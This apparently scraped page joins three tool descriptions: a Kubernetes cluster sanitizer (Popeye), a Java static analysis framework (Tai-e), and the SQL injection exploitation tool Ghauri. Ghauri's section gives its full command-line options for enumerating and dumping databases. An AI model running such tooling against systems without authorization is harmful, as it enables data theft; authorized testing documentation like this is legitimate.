  • Popeye uses 256 colors terminal mode. On `Nix system make sure TERM is set accordingly.

    export TERM=xterm-256color

Sanitizers

Popeye scans your cluster for best practices and potential issues. Currently, Popeye only looks at nodes, namespaces, pods and services. More will come soon! We are hoping Kubernetes friends will pitch'in to make Popeye even better.

The aim of the sanitizers is to pick up on misconfigurations, i.e. things like port mismatches, dead or unused resources, metrics utilization, probes, container images, RBAC rules, naked resources, etc...

Popeye is not another static analysis tool. It runs and inspect Kubernetes resources on live clusters and sanitize resources as they are in the wild!

Here is a list of some of the available sanitizers:

Resource Sanitizers Aliases
Node no
Conditions ie not ready, out of mem/disk, network, pids, etc
Pod tolerations referencing node taints
CPU/MEM utilization metrics, trips if over limits (default 80% CPU/MEM)
Namespace ns
Inactive
Dead namespaces
Pod po
Pod status
Containers statuses
ServiceAccount presence
CPU/MEM on containers over a set CPU/MEM limit (default 80% CPU/MEM)
Container image with no tags
Container image using latest tag
Resources request/limits presence
Probes liveness/readiness presence
Named ports and their references
Service svc
Endpoints presence
Matching pods labels
Named ports and their references
ServiceAccount sa
Unused, detects potentially unused SAs
Secrets sec
Unused, detects potentially unused secrets or associated keys
ConfigMap cm
Unused, detects potentially unused cm or associated keys
Deployment dp, deploy
Unused, pod template validation, resource utilization
StatefulSet sts
Unsed, pod template validation, resource utilization
DaemonSet ds
Unsed, pod template validation, resource utilization
PersistentVolume pv
Unused, check volume bound or volume error
PersistentVolumeClaim pvc
Unused, check bounded or volume mount error
HorizontalPodAutoscaler hpa
Unused, Utilization, Max burst checks
PodDisruptionBudget
Unused, Check minAvailable configuration pdb
ClusterRole
Unused cr
ClusterRoleBinding
Unused crb
Role
Unused ro
RoleBinding
Unused rb
Ingress
Valid ing
NetworkPolicy
Valid np
PodSecurityPolicy
Valid psp

You can also see the full list of codes

Save the report

To save the Popeye report to a file pass the --save flag to the command. By default it will create a temp directory and will store the report there, the path of the temp directory will be printed out on STDOUT. If you have the need to specify the output directory for the report, you can use the environment variable POPEYE_REPORT_DIR. By default, the name of the output file follow the following format : sanitizer_<cluster-name>_<time-UnixNano>.<output-extension> (e.g. : "sanitizer-mycluster-1594019782530851873.html"). If you have the need to specify the output file name for the report, you can pass the --output-file flag with the filename you want as parameter.

Example to save report in working directory:

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save

Example to save report in working directory in HTML format under the name "report.html" :

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save --out html --output-file report.html

Save the report to S3

You can also save the generated report to an AWS S3 bucket (or another S3 compatible Object Storage) with providing the flag --s3-bucket. As parameter you need to provide the name of the S3 bucket where you want to store the report. To save the report in a bucket subdirectory provide the bucket parameter as bucket/path/to/report.

Underlying the AWS Go lib is used which is handling the credential loading. For more information check out the official documentation.

Example to save report to S3:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --out=json

If AWS sS3 is not your bag, you can further define an S3 compatible storage (OVHcloud Object Storage, Minio, Google cloud storage, etc...) using s3-endpoint and s3-region as so:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --s3-region YOUR-REGION --s3-endpoint URL-OF-THE-ENDPOINT

Run public Docker image locally

You don't have to build and/or install the binary to run popeye: you can just run it directly from the official docker repo on DockerHub. The default command when you run the docker container is popeye, so you just need to pass whatever cli args are normally passed to popeye. To access your clusters, map your local kube config directory into the container with -v :

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
derailed/popeye --context foo -n bar

Running the above docker command with --rm means that the container gets deleted when popeye exits. When you use --save, it will write it to /tmp in the container and then delete the container when popeye exits, which means you lose the output. To get around this, map /tmp to the container's /tmp. NOTE: You can override the default output directory location by setting POPEYE_REPORT_DIR env variable.

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
-e POPEYE_REPORT_DIR=/tmp/popeye \
-v /tmp:/tmp \
derailed/popeye --context foo -n bar --save --output-file my_report.txt

# Docker has exited, and the container has been deleted, but the file
# is in your /tmp directory because you mapped it into the container
$ cat /tmp/popeye/my_report.txt
<snip>

The Command Line

You can use Popeye standalone or using a spinach yaml config to tune the sanitizer. Details about the Popeye configuration file are below.

kubeconfig environment. popeye # Popeye uses a spinach config file of course! aka spinachyaml! popeye -f spinach.yml # Popeye a cluster using a kubeconfig context. popeye --context olive # Stuck? popeye help" dir="auto">
# Dump version info
popeye version
# Popeye a cluster using your current kubeconfig environment.
popeye
# Popeye uses a spinach config file of course! aka spinachyaml!
popeye -f spinach.yml
# Popeye a cluster using a kubeconfig context.
popeye --context olive
# Stuck?
popeye help

Output Formats

Popeye can generate sanitizer reports in a variety of formats. You can use the -o cli option and pick your poison from there.

Format Description Default Credits
standard The full monty output iconized and colorized yes
jurassic No icons or color like it's 1979
yaml As YAML
html As HTML
json As JSON
junit For the Java melancholic
prometheus Dumps report a prometheus scrappable metrics dardanel
score Returns a single cluster sanitizer score value (0-100) kabute

The SpinachYAML Configuration

A spinach.yml configuration file can be specified via the -f option to further configure the sanitizers. This file may specify the container utilization threshold and specific sanitizer configurations as well as resources that will be excluded from the sanitization.

NOTE: This file will change as Popeye matures!

Under the excludes key you can configure to skip certain resources, or certain checks by code. Here, resource types are indicated in a group/version/resource notation. Example: to exclude PodDisruptionBugdets, use the notation policy/v1/poddisruptionbudgets. Note that the resource name is written in the plural form and everything is spelled in lowercase. For resources without an API group, the group part is omitted (Examples: v1/pods, v1/services, v1/configmaps).

A resource is identified by a resource kind and a fully qualified resource name, i.e. namespace/resource_name.

For example, the FQN of a pod named fred-1234 in the namespace blee will be blee/fred-1234. This provides for differentiating fred/p1 and blee/p1. For cluster wide resources, the FQN is equivalent to the name. Exclude rules can have either a straight string match or a regular expression. In the latter case the regular expression must be indicated using the rx: prefix.

NOTE! Please be careful with your regex as more resources than expected may get excluded from the report with a loose regex rule. When your cluster resources change, this could lead to a sub-optimal sanitization. Once in a while it might be a good idea to run Popeye „configless“ to make sure you will recognize any new issues that may have arisen in your clusters…

Here is an example spinach file as it stands in this release. There is a fuller eks and aks based spinach file in this repo under spinach. (BTW: for new comers into the project, might be a great way to contribute by adding cluster specific spinach file PRs...)

# A Popeye sample configuration file
popeye:
# Checks resources against reported metrics usage.
# If over/under these thresholds a sanitization warning will be issued.
# Your cluster must run a metrics-server for these to take place!
allocations:
cpu:
underPercUtilization: 200 # Checks if cpu is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if cpu is over allocated by more than 50% at current load.
memory:
underPercUtilization: 200 # Checks if mem is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if mem is over allocated by more than 50% usage at current load.

# Excludes excludes certain resources from Popeye scans
excludes:
v1/pods:
# In the monitoring namespace excludes all probes check on pod's containers.
- name: rx:monitoring
code s:
- 102
# Excludes all istio-proxy container scans for pods in the icx namespace.
- name: rx:icx/.*
containers:
# Excludes istio init/sidecar container from scan!
- istio-proxy
- istio-init
# ConfigMap sanitizer exclusions...
v1/configmaps:
# Excludes key must match the singular form of the resource.
# For instance this rule will exclude all configmaps named fred.v2.3 and fred.v2.4
- name: rx:fred.+\.v\d+
# Namespace sanitizer exclusions...
v1/namespaces:
# Exclude all fred* namespaces if the namespaces are not found (404), other error codes will be reported!
- name: rx:kube
codes:
- 404
# Exclude all istio* namespaces from being scanned.
- name: rx:istio
# Completely exclude horizontal pod autoscalers.
autoscaling/v1/horizontalpodautoscalers:
- name: rx:.*

# Configure node resources.
node:
# Limits set a cpu/mem threshold in % ie if cpu|mem > limit a lint warning is triggered.
limits:
# CPU checks if current CPU utilization on a node is greater than 90%.
cpu: 90
# Memory checks if current Memory utilization on a node is greater than 80%.
memory: 80

# Configure pod resources
pod:
# Restarts check the restarts count and triggers a lint warning if above threshold.
restarts:
3
# Check container resource utilization in percent.
# Issues a lint warning if about these threshold.
limits:
cpu: 80
memory: 75

# Configure a list of allowed registries to pull images from
registries:
- quay.io
- docker.io

Popeye In Your Clusters!

Alternatively, Popeye is containerized and can be run directly in your Kubernetes clusters as a one-off or CronJob.

Here is a sample setup, please modify per your needs/wants. The manifests for this are in the k8s directory in this repo.

kubectl apply -f k8s/popeye/ns.yml && kubectl apply -f k8s/popeye
---
apiVersion: batch/v1
kind: CronJob
metadata:
name: popeye
namespace: popeye
spec:
schedule: "* */1 * * *" # Fire off Popeye once an hour
concurrencyPolicy: Forbid
jobTemplate:
spec:
template:
spec:
serviceAccountName: popeye
restartPolicy: Never
containers:
- name: popeye
image: derailed/popeye
imagePullPolicy: IfNotPresent
args:
- -o
- yaml
- --force-exit-zero
- true
resources:
limits:
cpu: 500m
memory: 100Mi

The --force-exit-zero should be set to true. Otherwise, the pods will end up in an error state. Note that popeye exits with a non-zero error code if the report has any errors.

Popeye got your RBAC!

In order for Popeye to do his work, the signed-in user must have enough RBAC oomph to get/list the resources mentioned above.

Sample Popeye RBAC Rules (please note that those are subject to change.)

---
# Popeye ServiceAccount.
apiVersion: v1
kind: ServiceAccount
metadata:
name: popeye
namespace: popeye

---
# Popeye needs get/list access on the following Kubernetes resources.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: popeye
rules:
- apiGroups: [""]
resources:
- configmaps
- deployments
- endpoints
- horizontalpodautoscalers
- namespaces
- nodes
- persistentvolumes
- persistentvolumeclaims
- pods
- secrets
- serviceaccounts
- services
- statefulsets
verbs: ["get", "list"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources:
- clusterroles
- clusterrolebindings
- roles
- rolebindings
verbs: ["get", "list"]
- apiGroups: ["metrics.k8s.io"]
resources :
- pods
- nodes
verbs: ["get", "list"]

---
# Binds Popeye to this ClusterRole.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: popeye
subjects:
- kind: ServiceAccount
name: popeye
namespace: popeye
roleRef:
kind: ClusterRole
name: popeye
apiGroup: rbac.authorization.k8s.io

Screenshots

Cluster D Score

Cluster A Score

Report Morphology

The sanitizer report outputs each resource group scanned and their potential issues. The report is color/emoji coded in term of Sanitizer severity levels:

Level Icon Jurassic Color Description
Ok
OK Green Happy!
Info
I BlueGreen FYI
Warn
W Yellow Potential Issue
Error
E Red Action required

The heading section for each scanned Kubernetes resource provides a summary count for each of the categories above.

The Summary section provides a Popeye Score based on the sanitization pass on the given cluster.

Known Issues

This initial drop is brittle. Popeye will most likely blow up when…

  • You're running older versions of Kubernetes. Popeye works best with Kubernetes 1.13+.
  • You don't have enough RBAC oomph to manage your cluster (see RBAC section)

Disclaimer

This is work in progress! If there is enough interest in the Kubernetes community, we will enhance per your recommendations/contributions. Also if you dig this effort, please let us know that too!

ATTA Girls/Boys!

Popeye sits on top of many of open source projects and libraries. Our sincere appreciations to all the OSS contributors that work nights and weekends to make this project a reality!

Contact Info

  1. Email: fernand@imhotep.io
  2. Twitter: @kitesurfer


Tai-e - An Easy-To-Learn/Use Static Analysis Framework For Java


Tai-e

What is Tai-e?

Tai-e (Chinese: 太阿; pronunciation: [ˈtaɪə:]) is a new static analysis framework for Java (please see our technical report for details), which features arguably the "best" designs from both the novel ones we proposed and those of classic frameworks such as Soot, WALA, Doop, and SpotBugs. Tai-e is easy-to-learn, easy-to-use, efficient, and highly extensible, allowing you to easily develop new analyses on top of it.

Currently, Tai-e provides the following major analysis components (and more analyses are on the way):

  • Powerful pointer analysis framework
    • On-the-fly call graph construction
    • Various classic and advanced techniques of heap abstraction and context sensitivity for pointer analysis
    • Extensible analysis plugin system (allows to conveniently develop and add new analyses that interact with pointer analysis)
  • Various fundamental/client/utility analyses
    • Fundamental analyses, e.g., reflection analysis and exception analysis
    • Modern language feature analyses, e.g., lambda and method reference analysis, and invokedynamic analysis
    • Clients, e.g., configurable taint analysis (allowing to configure sources, sinks and taint transfers)
    • Utility tools like analysis timer, constraint checker (for debugging), and various graph dumpers
  • Control/Data-flow analysis framework
    • Control-flow graph construction
    • Classic data-flow analyses, e.g., live variable analysis, constant propagation
    • Your data-flow analyses
  • SpotBugs-like bug detection system
    • Bug detectors, e.g., null pointer detector, incorrect clone() detector
    • Your bug detectors

Tai-e is developed in Java, and it can run on major operating systems including Windows, Linux, and macOS.


How to Obtain Runnable Jar of Tai-e?

The simplest way is to download it from GitHub Releases.

Alternatively, you might build the latest Tai-e yourself from the source code. This can be simply done via Gradle (be sure that Java 17 (or higher version) is available on your system). You just need to run command gradlew fatJar, and then the runnable jar will be generated in tai-e/build/, which includes Tai-e and all its dependencies.

Documentation

We are hosting the documentation of Tai-e on the GitHub wiki, where you could find more information about Tai-e such as Setup in IntelliJ IDEA , Command-Line Options , and Development of New Analysis .

Tai-e Assignments

In addition, we have developed an educational version of Tai-e where eight programming assignments are carefully designed for systematically training learners to implement various static analysis techniques to analyze real Java programs. The educational version shares a large amount of code with Tai-e, thus doing the assignments would be a good way to get familiar with Tai-e.



Ghauri - An Advanced Cross-Platform Tool That Automates The Process Of Detecting And Exploiting SQL Injection Security Flaws


An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws


Requirements

  • Python 3
  • Python pip3

Installation

  • cd to ghauri directory.
  • install requirements: python3 -m pip install --upgrade -r requirements.txt
  • run: python3 setup.py install or python3 -m pip install -e .
  • you will be able to access and run the ghauri with simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

  • Supports following types of injection payloads:
    • Boolean based.
    • Error Based
    • Time Based
    • Stacked Queries
  • Support SQL injection for following DBMS.
    • MySQL
    • Microsoft SQL Server
    • Postgre
    • Oracle
  • Supports following injection types.
    • GET/POST Based injections
    • Headers Based injections
    • Cookies Based injections
    • Mulitipart Form data injections
    • JSON based injections
  • support proxy option --proxy.
  • supports parsing request from txt file: switch for that -r file.txt
  • supports limiting data extraction for dbs/tables/columns/dump: swicth --start 1 --stop 2
  • added support for resuming of all phases.
  • added support for skip urlencoding switch: --skip-urlencode
  • added support to verify extracted characters in case of boolean/time based injections.

Advanced Usage


Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform python based advanced sql injections detection & exploitation tool.

General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target

Target:
At least one of these options has to be provided to define the
target(s)

-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1).
-r REQUESTFILE Load HTTP request from a file

Request:
These options can be used to specify how to connect to the target URL

-A , --user-agent HTTP User-Agent header value -H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS

Injection:
These options can be used to specify which paramete rs to test for,
provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string

Detection:
These options can be used to customize the detection phase

--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content

Techniques:
These options can be used to tweak testing of specific SQL injection
techniques

--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)

Enumeration:
These options can be used to enumerate the back-end database
managment system information, structure and data contained in the
tables.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database tables(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrive entries from offset for dbs/tables/columns/dump
--stop Retrive entries till offset for dbs/tables/columns/dump

Example:
ghauri http://www.site.com/vuln.php?id=1 --dbs

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local,state and federal laws.
Developer assume no liability and is not responsible for any misuse or damage caused by this program.

TODO

  • Add support for inline queries.
  • Add support for Union based queries


❌